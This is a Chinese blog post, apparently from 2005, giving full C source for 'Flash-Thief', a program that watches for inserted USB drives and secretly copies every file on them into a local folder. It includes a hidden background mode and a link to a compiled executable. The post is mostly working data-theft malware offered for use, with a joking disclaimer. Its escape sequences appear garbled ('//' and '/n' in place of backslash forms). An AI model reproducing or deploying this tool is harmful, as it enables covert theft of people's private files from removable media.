看某期《黑客防线》上有介绍编写“U盘小偷”这个盗取U盘内所有文件的程序的文章,反正也没事做,自己也写了一个。文中是用VC++加MFC写的,我用C、API来写,而且名字叫“U盘大盗”,不然怎么会叫DIY呢^_^
原理很简单,就是每隔一段时间探测驱动器,发现可移动盘就把里面的内容copy到机器上。几下子就搞定。代码如下,有关函数的可参考MSDN、CSDN搜索(还多亏了它呢)。
#include "windows.h"
#include "stdio.h"
#include "string.h"
#include "direct.h"
char dir[260];
/*
看好啦,偷东西咯~
*/
void Copy( char* FileName )
{
char dir2[260];
strcpy( dir2 , dir );
//从全路径提取出文件名
char* temp = strchr(FileName,'//');
temp++;
strcat(dir2 , temp );
CopyFile( FileName , dir2 , 1 );
}
void CreateDir( char * path )
{
char temp2[260];strcpy( temp2 , dir );
char* temp = strchr( path , '//');
temp++;
strcat(temp2 , temp );
mkdir( temp2 );
}
/*
这个函数就是遍历目录得到文件
*/
void GetFile( char* FilePath )
{
char temp[260],temp1[260];
strcpy( temp ,FilePath );
WIN32_FIND_DATA FindFileData;
HANDLE hFind;
strcat( temp , "*");
//printf("%s",temp);
hFind = FindFirstFile( temp , &FindFileData );
//printf("%s/n",FindFileData.cFileName );
if ( hFind == INVALID_HANDLE_VALUE )
{
//printf ("Invalid File Handle. GetLastError reports %d/n", GetLastError ());
//exit(0);
}
else
{
//printf("%s",temp1);
do
{
strcpy( temp1 , FilePath );
strcat( temp1 , FindFileData.cFileName );
if(strcmp( FindFileData.cFileName , "." )!=0&&strcmp( FindFileData.cFileName , ".." )!=0)
{
if( FindFileData.dwFileAttributes == FILE_ATTRIBUTE_DIRECTORY )
{
strcat( temp1 , "//" );
CreateDir( temp1 );
GetFile( temp1 );
}
else
{
//printf("%s/n",temp1 );
Copy( temp1 );
}
}
}while( FindNextFile( hFind,&FindFileData ) );
}
FindClose(hFind);
}
/*
这个函数检测是否为可移动磁盘
*/
int CheckDisk(char *disk)
{
if(GetDriveType(disk)==DRIVE_REMOVABLE)return 0;
return -1;
}
int Steal()
{
char buf[10];
DWORD lod=GetLogicalDrives();
/*
GetLogicalDrives 返回的是一个32位整数,将他转换成二进制后,最高位表示驱动器A: 依次类推
比如,10111000000000000000000000000000
表示这台机器有驱动器 a,c,d,e
*/
if (lod!=0)
{
for (int i=0;i<26;i++)
{
if ((lod & 1)==1)
{
sprintf(buf,"%c",'A'+i);
strcat(buf,"://");
if(!CheckDisk(buf))
{
//现在判断驱动是否准备就绪~
if(GetVolumeInformation(buf,0,0,0,0,0,0,0))
{
GetFile(buf);//!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
//GetFile("j://a//");
}
}
}
lod=lod>>1;
}
}
return 0;
}
int main(int argc, char* argv[])
{
SYSTEMTIME st;
char dtime[20],temp[10];
GetLocalTime( &st );
itoa( st.wYear ,temp , 10 );
strcpy( dtime , temp );
itoa( st.wMonth ,temp , 10 );
strcat( dtime , temp );
itoa( st.wDay ,temp , 10 );
strcat( dtime , temp );
mkdir( dtime );
getcwd( dir , 260 );
strcat( dir , "//");
strcat( dir , dtime );
strcat( dir , "//" );
if(argc!=2)
{
printf("/n Flash-Thief 1.0 by lake2 ( http://lake2.126.com ) /n");
printf("Date: /t2005-5-28/n");
printf("You can quit this program with Ctrl + C /nand you can run it in hide mode with /'-hide/' /n");
printf("It's nothing with me whatever you do ! /n");
printf("Running......./n");
while(1)
{
Steal();
Sleep(30000);
}
}
else
{
if(strcmp( argv[1] , "-hide" )==0){printf("It's nothing with me whatever you do ! /n");ShellExecute( 0, "open", argv[0], NULL, NULL, SW_HIDE );}
else
printf("Parameter %s is invalid",argv[1]);
}
return 0;
}
程序是命令行下的,加参数“-hide”可以后台运行;运行后会在当前目录生成当前日期的文件夹,盗取的东东都放在里面。程序有个小问题,就是当可移动设备是个移动硬盘的时候,呵呵,恐怕你的硬盘要很大才行哦。这个问题不想改了。
VS.net + XP SP1 编译通过,编译好的程序这里可以下http://www.0x54.org/lake2/program/flash-thief.exe
程序做好到现在我都没有拿来用,其实我是一个好人^_^